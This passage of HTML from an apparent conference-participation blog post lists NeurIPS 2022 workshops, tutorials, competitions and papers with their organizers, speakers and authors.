Dragan</b></i><br>Program Committees include:<i><b> Julia Kreutzer</b></i>,<i><b> Shunyu Yao</b></i></p>  <p><a href="https://ml4physicalsciences.github.io/2022/">Machine Learning and the Physical Sciences</a><br>Workshop Organizers include: <i><b>Adji Bousso Dieng</b></i><br>Invited Speakers include: <i><b>Ekin Doğuş Çubuk</b></i></p>  <p><a href="http://mlforsystems.org/">Machine Learning for Systems</a><br>Workshop Organizers include:<i><b> Martin Maas</b></i>, <i><b>Azade Nova</b></i>,<i><b> Dan Zhang</b></i><br>Invited Speakers include: <i><b>Jeff Dean</b></i><br>Program Committee includes: <i><b>Milad Hashemi</b></i>, <i><b>Kevin Swersky</b></i></p>  <p><a href="https://www.mlsb.io/">Machine Learning in Structural Biology</a><br>Invited Speakers include: <i><b>David Fleet</b></i></p>  <p><a href="https://mathai2022.github.io/">MATH-AI: Toward Human-Level Mathematical Reasoning</a><br>Workshop Organizers include: <i><b>Swaroop Mishra</b></i>, <i><b>Yuhuai Wu</b></i><br>Invited Speakers include:<i><b> Talia Ringer</b></i></p>   <p><a href="https://opt-ml.org/index.html">OPT 2022: Optimization for Machine Learning</a><br>Workshop Organizers include: <i><b>Courtney Paquette</b></i></p>  <p><a href="https://sites.google.com/corp/view/RL4RealLife">Reinforcement Learning for Real Life (RL4RealLife)</a><br>Workshop Organizers include: <i><b>Minmin Chen</b></i><br>Invited Panelists include: <i><b>Pablo Samuel Castro</b></i><br>Program Committee includes: <i><b>Victor Carbune</b></i>,<i><b> Bo Chang</b></i>, <i><b>Yinlam Chow</b></i>, <i><b>Konstantina Christakopoulou</b></i>, <i><b>Bo Dai</b></i>, <i><b>Hanjun Dai</b></i>, <i><b>Aleksandra Faust</b></i>,<i><b> Joshua Greaves‎</b></i>,<i><b> Chih-wei Hsu, Rahul Kidambi</b></i>,<i><b> Srivatsan Krishnan</b></i>,<i><b> Iou-Jen Liu</b></i>, <i><b>Cong Lu</b></i>,<i><b> Jincheng Mei</b></i>, <i><b>Chao Qin</b></i></p>  <p><a href="https://sslneurips22.github.io/index.html">Self-Supervised Learning - Theory and Practice</a><br>Invited Speakers include: <i><b>Mathilde Caron</b></i></p>  <p><a href="https://www.neurreps.org/">Symmetry and Geometry in Neural Representations (NeurReps)</a><br>Invited Speakers include: <i><b>Noah Shutty</b></i><br>Program Committee includes: <i><b>Ondrej Biza</b></i>, <i><b>Noah Shutty</b></i></p>  <p><a href="https://sites.google.com/corp/view/tglworkshop2022/home">Temporal Graph Learning Workshop</a><br>Invited Speakers include: <i><b>Mehran Kazemi</b></i></p>  <p><a href="https://tl4nlp.github.io/">Transfer Learning for Natural Language Processing</a><br>Workshop Organizers include: <i><b>Deepak Ramachandran</b></i>, <i><b>Sebastian Ruder</b></i><br>Invited Speakers include: <i><b>Jonas Pfeiffer</b></i><br>Invited Debaters include: <i><b>Ellie Pavlick</b></i><br>Program Committee includes: <i><b>Patrick Fernandes</b></i>,<i><b> Jonas Pfeiffer</b></i>,<i><b> Jiao Sun,</b></i> <i><b>Tu Vu</b></i>,<i><b> Xinyi Wang</b></i>, <i><b>Xin Xu</b></i></p>   <p><a href="https://ai-cultures.github.io/">Cultures of AI and AI for Culture</a><br>Workshop Organizers include: <i><b>Rida Qadri</b></i>,<i><b> Fernando Diaz</b></i></p>  <p><a href="https://sites.google.com/corp/view/deep-rl-workshop-neurips-2022">Deep Reinforcement Learning Workshop</a><br>Workshop Organizers include: <i><b>Karol Hausman</b></i>, <i><b>Ted Xiao</b></i>, <i><b>Zeyu Zheng</b></i><br>Invited Speakers include: <i><b>Igor Mordatch</b></i><br>Advisory Board includes: <i><b>Chelsea Finn</b></i></p>  <p><a href="https://sites.google.com/corp/view/pai4mh/">Empowering Communities: A Participatory Approach to AI for Mental Health</a><br>Program Committee includes: <i><b>Diana Mincu</b></i>, <i><b>Subhrajit Roy</b></i>,<i><b> Martin Seneviratne</b></i></p>  <p><a href="https://hcai-at-neurips.github.io/site/index.html">HCAI@NeurIPS 2022, Human Centered AI</a><br>Keynote Speaker includes: <i><b>Fernanda Viegas</b></i></p>   <p><a href="https://www.lmrl.org/">Learning Meaningful Representations of Life</a><br>Workshop Organizers include:<i><b> Adji Bousso Dieng</b></i></p>  <p><a href="https://neuripscreativityworkshop.github.io/2022/">Machine Learning for Creativity and Design</a><br>Workshop Organizers include: <i><b>Yingtao Tian</b></i></p>  <p><a href="https://neurips2022.mlsafety.org/">Machine Learning Safety</a><br>Workshop Organizers include: <i><b>Nicholas Carlini</b></i><br>Invited Speakers include: <i><b>Dorsa Sadigh</b></i></p>  <p><a href="https://ncsi.cause-lab.net/">Neuro Causal and Symbolic AI (nCSI)</a><br>Workshop Organizers include: <i><b>Thomas Kipf</b></i></p>  <p><a href="http://www.robot-learning.ml/2022/">Robot Learning Workshop: Trustworthy Robotics</a><br>Workshop Organizers include: <i><b>Alex Bewley</b></i>, <i><b>Jonathan Tompson</b></i><br>Invited Speakers include:<i><b> Karol Hausman</b></i>, <i><b>Brian Ichter</b></i>,<i><b> Been Kim</b></i>,<i><b> Leila Takayama</b></i>,<i><b> Andy Zeng</b></i><br>Program Committee includes: <i><b>Vincent Vanhoucke</b></i></p>  <p><a href="https://dlde-2022.github.io/">The Symbiosis of Deep Learning and Differential Equations II</a><br>Workshop Organizers include: <i><b>Winnie Xu</b></i><br>Invited Speakers include: <i><b>Rose Yu</b></i></p>  <p><a href="https://www.climatechange.ai/events/neurips2022">Tackling Climate Change with Machine Learning</a><br>Workshop Organizers include: <i><b>Emma Strubell</b></i></p>  <p><a href="https://tsrml2022.github.io/">Trustworthy and Socially Responsible Machine Learning</a><br>Invited Speakers include:<i><b> Been Kim, Dorsa Sadigh</b></i>, <i><b>Milind Tambe</b></i></p>  <p><a href="https://sites.google.com/corp/view/vtta-neurips2022/home?authuser=0">Vision Transformers: Theory and Applications</a><br>Invited Speakers include: <i><b>Cordelia Schmid</b></i>,<i><b> Ming Hsuan Yang</b></i></p>       <div>    <br></div><h2>Tutorials</h2>  <p><a href="https://nips.cc/virtual/2022/tutorial/55806#wse-detail-55845">Advances in Bayesian Optimization</a><br>Tutorial Organizers include: <i><b>Virginia Aglietti</b></i></p>  <p><a href="https://nips.cc/virtual/2022/tutorial/55812">Creative Culture and Machine Learning</a><br>Tutorial Organizers include: <i><b>Negar Rostamzadeh</b></i></p>  <p><a href="https://fair-recs-tutorial.github.io/neurips-2022-tutorial/">Fair and Socially Responsible ML for Recommendations: Challenges and Perspectives</a><br>Invited Panelists include: <i><b>Fernando Diaz</b></i></p> <p><a href="https://sites.google.com/corp/view/neurips2022-llm-tutorial">Lifelong Learning Machines</a><br>Invited Panelists include: <i><b>Christopher Summerfield</b></i></p>  <p><a href="https://nips.cc/virtual/2022/tutorial/55814">The Role of Meta-learning for Few-Shot Learning</a><br>Tutorial Organizers include: <i><b>Eleni Triantafillou</b></i><br>Invited Panelists include: <i><b>Neil</b></i> <i><b>Houlsby</b></i>, <i><b>Priyanka Agrawal</b></i></p>       <div>    <br></div><h2>Competitions</h2>  <p><a href="https://nips.cc/virtual/2022/competition/63835">NeurIPS 2022 Competition Track: Overview &amp; Results</a><br>Invited Speakers include: <i><b>Isabelle Guyon</b></i></p>  <p><a href="https://nips.cc/virtual/2022/competition/50087">Causal Insights for Learning Paths in Education</a><br>Competition Organizers include: <i><b>Zichao (Jack) Wang</b></i></p>  <p><a href="https://nips.cc/virtual/2022/competition/50097">IGLU: Interactive Grounded Language Understanding in a Collaborative Environment</a><br>Competition Organizers include: <i><b>Negar Arabzadeh</b></i></p>  <p><a href="https://metalearning.chalearn.org/">Cross-Domain MetaDL: Any-Way Any-Shot Learning Competition with Novel Datasets from Practical Domains</a><br>Competition Organizers include: <i><b>Isabelle Guyon</b></i></p>  <p><a href="https://nips.cc/virtual/2022/competition/50093">Reconnaissance Blind Chess: An Unsolved Challenge for Multi-Agent Decision Making Under Uncertainty</a><br>Competition Organizers include: <i><b>Bo Li</b></i></p>  <p><a href="https://nips.cc/virtual/2022/competition/50088">VisDA 2022 Challenge: Sim2Real Domain Adaptation for Industrial Recycling</a><br>Competition Organizers include: <i><b>Dina Bashkirova</b></i></p>      <div>    <br></div><h2>Spotlight Papers</h2>  <p><a href="https://openreview.net/pdf?id=r5rzV51GZx">CoPur: Certifiably Robust Collaborative Inference via Feature Purification</a><br>Jing Liu, Chulin Xie, <i><b>Oluwasanmi O Koyejo</b></i>, Bo Li </p>  <p><a href="https://www.jmlr.org/papers/volume23/20-852/20-852.pdf">Machine Learning on Graphs: A Model and Comprehensive Taxonomy</a><br>Ines Chami<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, Sami Abu-El-Haija, <i><b>Bryan Perozzi</b></i>, Christopher Ré, <i><b>Kevin Murphy</b></i></p>  <p><a href="https://openreview.net/pdf?id=wfKbtSjHA6F">Sparse Winning Tickets are Data-Efficient Image Recognizers</a><br>Mukund Varma T, Xuxi Chen, Zhenyu Zhang, Tianlong Chen, <i><b>Subhashini Venugopalan</b></i>, Zhangyang Wang </p>  <p><a href="https://openreview.net/pdf?id=mhQLcMjWw75">Federated Learning from Pre-trained Models: A Contrastive Learning Approach</a><br>Yue Tan, Guodong Long, Jie Ma, <i><b>Lu Liu</b></i>, Tianyi Zhou, Jing Jiang </p>   <p><a href="https://openreview.net/pdf?id=HLzjd09oRx">Improving Multi-task Generalization via Regularizing Spurious Correlation</a><br>Ziniu Hu<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, <i><b>Zhe Zhao</b></i>, <i><b>Xinyang Yi</b></i>,<i><b> Tiansheng Yao, Lichan Hong</b></i>, Yizhou Sun, <i><b>Ed H. Chi</b></i></p>  <p><a href="https://openreview.net/pdf?id=Mn4IkuWamy">The Nature of Temporal Difference Errors in Multi-step Distributional Reinforcement Learning</a><br>Yunhao Tang, Mark Rowland, Rémi Munos, Bernardo Ávila Pires, Will Dabney, <i><b>Marc G. Bellemare</b></i></p>  <p><a href="https://openreview.net/pdf?id=FlWdTyUznCc">Residual Multiplicative Filter Networks for Multiscale Reconstruction</a><br>Shayan Shekarforoush, David B. Lindell, <i><b>David J. Fleet</b></i>,<i><b> </b></i>Marcus A Brubaker </p>  <p><a href="https://openreview.net/pdf?id=a3ooPbW0Jzh">Differentially Private Learning with Margin Guarantees</a><br><i><b>Raef Bassily</b></i>, <i><b>Mehryar Mohri</b></i>,<i><b> Ananda Theertha Suresh</b></i></p>  <p><a href="https://openreview.net/pdf?id=1wz-ksUupt2">Optimal Query Complexities for Dynamic Trace Estimation</a><br>David P. Woodruff<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, Fred Zhang<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, <i><b>Qiuyi Zhang</b></i></p>      <div>    <br></div><h2>Papers</h2>  <p><a href="https://openreview.net/pdf?id=xuw7R0hP7G">From Gradient Flow on Population Loss to Learning with Stochastic Gradient Descent</a><br>Ayush Sekhari, <i><b>Satyen Kale</b></i>, Jason D. Lee, Chris De Sa, Karthik Sridharan </p>  <p><a href="https://openreview.net/pdf?id=X1oVDZIABwF">On the Global Convergence Rates of Decentralized Softmax Gradient Play in Markov Potential Games</a><br>Runyu Zhang, <i><b>Jincheng Mei</b></i>, <i><b>Bo Dai</b></i>,<i><b> Dale Schuurmans</b></i>,<i><b> </b></i>Na Li </p>  <p><a href="https://openreview.net/pdf?id=9njZa1fm35">Matryoshka Representation Learning</a><br><i><b>Aditya Kusupati</b></i>, Gantavya Bhatt, Aniket Rege, Matthew Wallingford, <i><b>Aditya Sinha</b></i>,<i><b> </b></i>Vivek Ramanujan, William Howard-Snyder, <i><b>Kaifeng Chen</b></i>, Sham Kakade, <i><b>Prateek Jain</b></i>, Ali Farhadi </p>  <p><a href="https://openreview.net/pdf?id=LdAxczs3m0">Efficient Risk-Averse Reinforcement Learning</a><br>Ido Greenberg, <i><b>Yinlam Chow,</b></i> <i><b>Mohammad Ghavamzadeh</b></i>, Shie Mannor </p>  <p><a href="https://openreview.net/pdf?id=VeXBywV9FV">Operator Splitting Value Iteration</a><br>Amin Rakhsha, Andrew Wang, <i><b>Mohammad Ghavamzadeh</b></i>, Amir-massoud Farahmand </p>  <p><a href="https://openreview.net/pdf?id=hqtSdpAK39W">Cluster Randomized Designs for One-Sided Bipartite Experiments</a><br>Jennifer Brennan<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, <i><b>Vahab Mirrokni</b></i>,<i><b> Jean Pouget-Abadie</b></i></p>  <p><a href="https://openreview.net/pdf?id=tjFaqsSK2I3">A Unified Sequence Interface for Vision Tasks</a><br><i><b>Ting Chen</b></i>,<i><b> Saurabh Saxena</b></i>,<i><b> Lala Li</b></i>, Tsung-Yi Lin<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>,<i><b> David J. Fleet</b></i>,<i><b> Geoffrey Hinton</b></i></p>  <p><a href="https://openreview.net/pdf?id=p-56bnzZhQ7">Cryptographic Hardness of Learning Halfspaces with Massart Noise</a><br>Ilias Diakonikolas, Daniel M. Kane, <i><b>Pasin Manurangsi</b></i>, Lisheng Ren </p>  <p><a href="https://openreview.net/pdf?id=ZE4lUw2iGcZ">Better Best of Both Worlds Bounds for Bandits with Switching Costs</a><br>Idan Amir, Guy Azov, <i><b>Tomer Koren</b></i>, Roi Livni </p>  <p><a href="https://openreview.net/pdf?id=yLilJ1vZgMe">Fast Neural Kernel Embeddings for General Activations</a><br>Insu Han, Amir Zandieh,<i><b> Jaehoon Lee</b></i>,<i><b> Roman Novak</b></i>, <i><b>Lechao Xiao</b></i>, <i><b>Amin Karbasi</b></i></p>  <p><a href="https://openreview.net/pdf?id=LpgG0C6Y75">Hierarchical Agglomerative Graph Clustering in Poly-Logarithmic Depth</a><br><i><b>Laxman Dhulipala</b></i>, <i><b>David Eisenstat</b></i>,<i><b> Jakub Łącki</b></i>, <i><b>Vahab Mirronki</b></i>, Jessica Shi </p>  <p><a href="https://openreview.net/pdf?id=Ls0yzIkEk1">Improving Zero-Shot Generalization in Offline Reinforcement Learning Using Generalized Similarity Functions</a><br>Bogdan Mazoure<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, Ilya Kostrikov, <i><b>Ofir Nachum</b></i>,<i><b> Jonathan Tompson</b></i></p>  <p><a href="https://openreview.net/pdf?id=Y1sWzKW0k4L">Indicators of Attack Failure: Debugging and Improving Optimization of Adversarial Examples</a><br>Maura Pintor, Luca Demetrio, Angelo Sotgiu, Ambra Demontis, <i><b>Nicholas Carlini</b></i>, Battista Biggio, Fabio Roli </p>  <p><a href="https://openreview.net/pdf?id=CmD5z_2DVuM">Learning Energy Networks with Generalized Fenchel-Young Losses</a><br><i><b>Mathieu Blondel</b></i>,<i><b> Felipe Llinares-López</b></i>,<i><b> Robert Dadashi</b></i>,<i><b> Léonard Hussenot</b></i>, <i><b>Matthieu Geist</b></i></p>   <p><a href="https://openreview.net/pdf?id=49TS-pwQWBa">Learning Robust Dynamics Through Variational Sparse Gating</a><br>Arnav Kumar Jain, Shiva Kanth Sujit, Shruti Joshi, Vincent Michalski, <i><b>Danijar Hafner</b></i>, Samira Ebrahimi Kahou </p>  <p><a href="https://openreview.net/pdf?id=hT0RbC2jCYZ">Learning to Reason with Neural Networks: Generalization, Unseen Data and Boolean Measures</a><br>Arnav Kumar Jain, Shiva Kanth Sujit, Shruti Joshi, Vincent Michalski, <i><b>Danijar Hafner</b></i>, Samira Ebrahimi Kahou </p>   <p><a href="https://openreview.net/pdf?id=tlUnxtAmcJq">So3krates: Equivariant Attention for Interactions on Arbitrary Length-Scales in Molecular Systems</a><br>J. Thorben Frank, <i><b>Oliver T. Unke, Klaus-Robert Müller</b></i></p>  <p><a href="https://openreview.net/pdf?id=BqnMaAvTNVq">Spectral Bias in Practice: The Role of Function Frequency in Generalization</a><br>Sara Fridovich-Keil<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, <i><b>Raphael Gontijo-Lopes</b></i>,<i><b> Rebecca Roelofs</b></i></p>   <p><a href="https://openreview.net/pdf?id=KnCS9390Va">Delving into Out-of-Distribution Detection with Vision-Language Representations</a><br>Yifei Ming, Ziyang Cai, Jiuxiang Gu, Yiyou Sun, <i><b>Wei Li</b></i>, Yixuan Li </p>  <p><a href="https://openreview.net/pdf?id=kgT6D7Z4Xv9">Path Independent Equilibrium Models Can Better Exploit Test-Time Computation</a><br>Cem Anil, Ashwini Pokle, Kaiqu Liang, Johannes Treutlein, <i><b>Yuhuai Wu</b></i>, Shaojie Bai, J. Zico Kolter, Roger Grosse </p>  <p><a href="https://openreview.net/pdf?id=6PpLxPPTPd">On Optimal Learning Under Targeted Data Poisoning</a><br>Steve Hanneke, <i><b>Amin Karbasi</b></i>, Mohammad Mahmoody, Idan Mehalel, <i><b>Shay Moran</b></i></p>  <p><a href="https://openreview.net/pdf?id=PDNEqcU-pP">Learning With Little Mixing</a><br>Ingvar Ziemann, <i><b>Stephen Tu</b></i></p>  <p><a href="https://openreview.net/pdf?id=uloenYmLCAo">Block-Recurrent Transformers</a><br><i><b>DeLesley Hutchins</b></i>, Imanol Schlag<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, <i><b>Yuhuai Wu</b></i>,<i><b> Ethan Dyer</b></i>,<i><b> Behnam Neyshabur</b></i></p>  <p><a href="https://openreview.net/pdf?id=hHrO6-IfskR">TabNAS: Rejection Sampling for Neural Architecture Search on Tabular Datasets</a><br><i><b>Chengrun Yang</b></i>,<i><b> Gabriel Bender</b></i>, <i><b>Hanxiao Liu</b></i>, <i><b>Pieter-Jan Kindermans</b></i>, Madeleine Udell, <i><b>Yifeng Lu</b></i>,<i><b> Quoc Le</b></i>,<i><b> Da Huang</b></i></p>  <p><a href="https://openreview.net/pdf?id=mamv07NQWk">Regret Bounds for Multilabel Classification in Sparse Label Regimes</a><br><i><b>Robert Busa-Fekete</b></i>,<i><b> Heejin Choi</b></i>, Krzysztof Dembczynski, <i><b>Claudio Gentile</b></i>, Henry William Reeve, Balazs Szorenyi </p>  <p><a href="https://openreview.net/pdf?id=AK6S9MZwM0">Robust Reinforcement Learning Using Offline Data</a><br>Kishan Panaganti, Zaiyan Xu, Dileep Kalathil, <i><b>Mohammad Ghavamzadeh</b></i></p>  <p><a href="https://openreview.net/pdf?id=vGQiU5sqUe3">Contrastive Learning as Goal-Conditioned Reinforcement Learning</a><br><i><b>Benjamin Eysenbach</b></i>, Tianjun Zhang, <i><b>Sergey Levine</b></i>, Ruslan Salakhutdinov </p>  <p><a href="https://openreview.net/pdf?id=SiQAZV0yEny">Beyond Rewards: A Hierarchical Perspective on Offline Multiagent Behavioral Analysis</a><br><i><b>Shayegan Omidshafiei</b></i>, <i><b>Andrei Kapishnikov</b></i>, <i><b>Yannick Assogba</b></i>,<i><b> Lucas Dixon</b></i>,<i><b> Been Kim</b></i></p>  <p><a href="https://openreview.net/pdf?id=h3RYh6IBBS">Revisiting Neural Scaling Laws in Language and Vision</a><br><i><b>Ibrahim Alabdulmohsin</b></i>,<i><b> Behnam Neyshabur</b></i>,<i><b> Xiaohua Zhai</b></i></p>  <p><a href="https://openreview.net/pdf?id=juE5ErmZB61">Polynomial Neural Fields for Subband Decomposition and Manipulation</a><br>Guandao Yang<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, Sagie Benaim, <i><b>Varun Jampani</b></i>,<i><b> Kyle Genova</b></i>,<i><b> Jonathan T. Barron</b></i>,<i><b> Thomas Funkhouser</b></i>, Bharath Hariharan, Serge Belongie </p>  <p><a href="https://openreview.net/pdf?id=yfrDD_rmD5">First Is Better Than Last for Language Data Influence</a><br><i><b>Chih-Kuan Yeh</b></i>,<i><b> Ankur Taly</b></i>,<i><b> Mukund Sundararajan</b></i>,<i><b> Frederick Liu</b></i>, Pradeep Ravikumar </p>  <p><a href="https://openreview.net/pdf?id=ErUlLrGaVEU">The Privacy Onion Effect: Memorization Is Relative</a><br><i><b>Nicholas Carlini</b></i>,<i><b> Matthew Jagielski</b></i>,<i><b> Chiyuan Zhang</b></i>,<i><b> Nicolas Papernot</b></i>, <i><b>Andreas Terzis</b></i>,<i><b> Florian Tramer</b></i></p>  <p><a href="https://openreview.net/pdf?id=wZk69kjy9_d">Deep Hierarchical Planning from Pixels</a> (see <a href="https://ai.googleblog.com/2022/07/deep-hierarchical-planning-from-pixels.html">blog post</a>) <br><i><b>Danijar Hafner</b></i>, <i><b>Kuang-Huei Lee</b></i>, <i><b>Ian Fischer</b></i>, Pieter Abbeel </p>  <p><a href="https://openreview.net/pdf?id=bVVIZjQ2AA">Discovered Policy Optimisation</a><br>Chris Lu, Jakub Grudzien Kuba, Alistair Letcher, <i><b>Luke Metz</b></i>, Christian Schroeder de Witt, Jakob Foerster </p>   <p><a href="https://openreview.net/pdf?id=i-UdJ6fWUFc">Semi-supervised Active Linear Regression</a><br>Fnu Devvrit, Nived Rajaraman, <i><b>Pranjal Awasthi</b></i></p>  <p><a href="https://openreview.net/pdf?id=OrcLKV9sKWp">Pruning’s Effect on Generalization Through the Lens of Training and Regularization</a><br>Tian Jin, Daniel M. Roy, Michael Carbin, Jonathan Frankle, <i><b>Gintare Karolina Dziugaite</b></i></p>  <p><a href="https://openreview.net/pdf?id=zSkYVeX7bC4">Exploring Length Generalization in Large Language Models</a><br>Cem Anil<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, <i><b>Yuhuai Wu</b></i>, <i><b>Anders Andreassen</b></i>,<i><b> Aitor Lewkowycz</b></i>, <i><b>Vedant Misra</b></i>,<i><b> Vinay Ramasesh</b></i>,<i><b> Ambrose Slone</b></i>,<i><b> Guy Gur-Ari</b></i>,<i><b> Ethan Dyer</b></i>,<i><b> Behnam Neyshabur</b></i></p>  <p><a href="https://openreview.net/pdf?id=WESmKHEH5nJ">Fast Stochastic Composite Minimization and an Accelerated Frank-Wolfe Algorithm Under Parallelization</a><br>Benjamin Dubois-Taine, Francis Bach, <i><b>Quentin Berthet</b></i>, Adrien Taylor </p>  <p><a href="https://openreview.net/pdf?id=monPF76G5Uv">Global Normalization for Streaming Speech Recognition in a Modular Framework</a><br><i><b>Ehsan Variani</b></i>,<i><b> Ke Wu</b></i>,<i><b> Michael Riley</b></i>,<i><b> David Rybach</b></i>,<i><b> Matt Shannon</b></i>,<i><b> Cyril Allauzen</b></i></p>  <p><a href="https://openreview.net/pdf?id=5OLcPQaYTVg">Learning Predictions for Algorithms with Predictions</a><br>Mikhail Khodak, Maria-Florina Balcan, Ameet Talwalkar, <i><b>Sergei Vassilvitskii</b></i></p>  <p><a href="https://openreview.net/pdf?id=Qy1D9JyMBg0">Multimodal Contrastive Learning with LIMoE: the Language-Image Mixture of Experts</a> (see <a href="https://ai.googleblog.com/2022/06/limoe-learning-multiple-modalities-with.html">blog post</a>) <br><i><b>Basil Mustafa</b></i>,<i><b> Carlos Riquelme</b></i>,<i><b> Joan Puigcerver</b></i>,<i><b> Rodolphe Jenatton</b></i>,<i><b> Neil Houlsby</b></i></p>   <p><a href="https://openreview.net/pdf?id=Haj8_Rwqq_H">Incrementality Bidding via Reinforcement Learning Under Mixed and Delayed Rewards</a><br><i><b>Ashwinkumar Badanidiyuru</b></i>,<i><b> Zhe Feng</b></i>, Tianxi Li, Haifeng Xu<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a></p>  <p><a href="https://openreview.net/pdf?id=IFXTZERXdM7">Solving Quantitative Reasoning Problems with Language Models</a> (see <a href="https://ai.googleblog.com/2022/06/minerva-solving-quantitative-reasoning.html">blog post</a>) <br><i><b>Aitor Lewkowycz</b></i>,<i><b> Anders Andreassen</b></i>,<i><b> David Dohan</b></i>,<i><b> Ethan Dyer</b></i>,<i><b> Henryk Michalewski</b></i>,<i><b> Vinay Ramasesh</b></i>,<i><b> Ambrose Slone</b></i>,<i><b> Cem Anil</b></i>,<i><b> Imanol Schlag</b></i>,<i><b> Theo Gutman-Solo</b></i>,<i><b> Yuhuai Wu</b></i>,<i><b> Behnam Neyshabur</b></i>,<i><b> Guy Gur-Ari</b></i>,<i><b> Vedant Misra</b></i></p>  <p><a href="https://openreview.net/pdf?id=dD3pwu4g8Fh">Anonymized Histograms in Intermediate Privacy Models</a><br><i><b>Badih Ghazi</b></i>, <i><b>Pritish Kamath</b></i>, <i><b>Ravi Kumar</b></i>, <i><b>Pasin Manurangsi</b></i></p>  <p><a href="https://openreview.net/pdf?id=aqALH2UAwQH">Efficient and Stable Fully Dynamic Facility Location</a><br>Sayan Bhattacharya, <i><b>Nikos</b></i> <i><b>Parotsidis</b></i>, <i><b>Silvio</b></i> <i><b>Lattanzi</b></i></p>  <p><a href="https://openreview.net/pdf?id=8rfYWE3nyXl">Are All Losses Created Equal: A Neural Collapse Perspective</a><br>Jinxin Zhou, <i><b>Chong You</b></i>,<i><b> </b></i>Xiao Li, Kangning Liu, Sheng Liu, Qing Qu, Zhihui Zhu </p>  <p><a href="https://openreview.net/pdf?id=dTTKMy00PTJ">Universal Rates for Interactive Learning</a><br>Steve Hanneke, <i><b>Amin Karbasi</b></i>, <i><b>Shay Moran</b></i>, Grigoris Velegkas </p>  <p><a href="https://openreview.net/pdf?id=YeuBRKq_yZ-">Nearly Optimal Algorithms for Linear Contextual Bandits with Adversarial Corruptions</a><br>Jiafan He, Dongruo Zhou, <i><b>Tong Zhang</b></i>, Quanquan Gu </p>  <p><a href="https://openreview.net/pdf?id=-N-OYK2cY7">Multiclass Learnability Beyond the PAC Framework: Universal Rates and Partial Concept Classes</a><br>Alkis Kalavasis, Grigoris Velegkas, <i><b>Amin Karbasi</b></i></p>       <p><a href="https://openreview.net/pdf?id=AODVskSug8">Temporal Latent Bottleneck: Synthesis of Fast and Slow Processing Mechanisms in Sequence Learning</a><br><i><b>Cenk Baykal</b></i>, <i><b>Nishanth Dikkala</b></i>,<i><b> Rina Panigrahy</b></i>, <i><b>Cyrus Rashtchian</b></i>, <i><b>Xin Wang</b></i></p><p>     <a href="https://openreview.net/pdf?id=FWMQYjFso-a">Pre-trained Language Models for Interactive Decision-Making</a><br>     Shuang Li, Xavier Puig, Chris Paxton, Yilun Du, Clinton Wang, Linxi Fan, Tao Chen, De-An Huang, Ekin Akyürek, Anima Anandkumar, Jacob Andreas, <i><b>Igor Mordatch</b></i>, Antonio Torralba, Yuke Zhu </p><p>     <a href="https://openreview.net/pdf?id=juE5ErmZB61">Polynomial Neural Fields for Subband Decomposition and Manipulation</a><br>     Guandao Yang<a href="http://ai.googleblog.com/#1" name="top1"><span class="Apple-style-span"><sup>*</sup></span></a>, Sagie Benaim, <i><b>Varun Jampani</b></i>,<i><b> Kyle Genova</b></i>, <i><b>Jonathan T. Barron</b></i>,<i><b> Thomas Funkhouser</b></i>, Bharath Hariharan, Serge Belongie </p><p>     <a href="https://openreview.net/pdf?id=JXY11Tc9mwY">Submodular Maximization in Clean Linear Time</a><br>     Wenxin Li, Moran Feldman, <i><b>Ehsan Kazemi</b></i>, <i><b>Amin Karbasi</b></i></p><p>     <a href="https://openreview.net/pdf?id=g2cM5983pw">Reinforcement Learning with Logarithmic Regret and Policy Switches</a><br>     Grigoris Velegkas, Zhuoran Yang, <i><b>Amin Karbasi</b></i></p><p>     <a href="https://openreview.net/pdf?id=wwWCZ7sER_C">Algorithms with Prediction Portfolios</a><br>     Michael Dinitz, Sungjin Im, Thomas Lavastida, Benjamin Moseley, <i><b>Sergei Vassilvitskii</b></i></p><p>     <a href="https://openreview.net/pdf?id=U138nQxHh3">Understanding and Improving Robustness of Vision Transformers Through Patch-Based Negative Augmentation</a><br><i><b>Yao Qin</b></i>, <i><b>Chiyuan Zhang</b></i>, <i><b>Ting Chen</b></i>, <i><b>Balaji Lakshminarayanan</b></i>,<i><b> Alex Beutel</b></i>,<i><b> Xuezhi Wang</b></i></p><p>     <a href="https://openreview.net/pdf?id=9-vs8BucEoo">Best of Both Worlds Model Selection</a><br>     Aldo Pacchiano, <i><b>Christoph Dann</b></i>, <i><b>Claudio Gentile</b></i></p><p>     <a href="https://openreview.net/pdf?id=rxrLt7rTlAr">Fair Wrapping for Black-Box Predictions</a><br>     Alexander Soen, <i><b>Ibrahim Alabdulmohsin</b></i>, <i><b>Sanmi Koyejo</b></i>, <i><b>Yishay Mansour</b></i>, <i><b>Nyalleng Moorosi</b></i>, <i><b>Richard Nock</b></i>, Ke Sun, Lexing Xie </p><p>     <a href="https://openreview.net/pdf?id=ogNrYe9CJlH">A Reduction to Binary Approach for Debiasing Multiclass Datasets</a><br><i><b>Ibrahim Alabdulmohsin</b></i>,<i><b> Jessica Schrouff</b></i>,<i><b> Oluwasanmi Koyejo</b></i></p><p>     <a href="https://openreview.net/pdf?id=M34VHvEU4NZ">Weighted Distillation with Unlabeled Examples</a><br><i><b>Fotis Iliopoulos</b></i>,<i><b> Vasilis Kontonis</b></i>,<i><b> Cenk Baykal</b></i>, <i><b>Gaurav Menghani</b></i>,<i><b> Khoa Trihn</b></i>,<i><b>Erik Vee</b></i></p>  <p>     <a href="https://openreview.net/pdf?id=cxZEBQFDoFK">A Closer Look at Learned Optimization: Stability, Robustness, and Inductive Biases</a><br><i><b>James Harrison</b></i>,<i><b> Luke Metz</b></i>, <i><b>Jascha Sohl-Dickstein</b></i></p><p>     <a href="https://openreview.net/pdf?id=_jg6Sf6tuF7">Post-hoc Estimators 